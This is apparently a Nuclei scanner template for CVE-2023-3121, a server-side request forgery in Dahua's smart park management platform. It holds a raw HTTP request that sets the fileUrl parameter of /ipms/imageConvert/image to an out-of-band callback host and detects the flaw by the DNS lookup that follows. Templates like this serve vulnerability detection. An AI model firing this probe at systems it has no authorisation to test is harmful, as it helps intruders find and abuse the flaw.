id: CVE-2023-3121

info:
  name: 大华智慧园区综合管理平台 image ssrf 漏洞
  author: SleepingBag945
  severity: medium
  description: |
    A vulnerability has been found in Dahua Smart Parking Management up to 20230528 and classified as problematic. This vulnerability affects unknown code of the file /ipms/imageConvert/image. The manipulation of the argument fileUrl leads to server-side request forgery. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-230800. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
  tags: dahua,ssrf


variables:
  filename: "{{to_lower(rand_base(10))}}"


http:
  - raw:
      - |
        GET /ipms/imageConvert/image?fileUrl=http://{{interactsh-url}}/{{filename}}.jpg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: close



    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"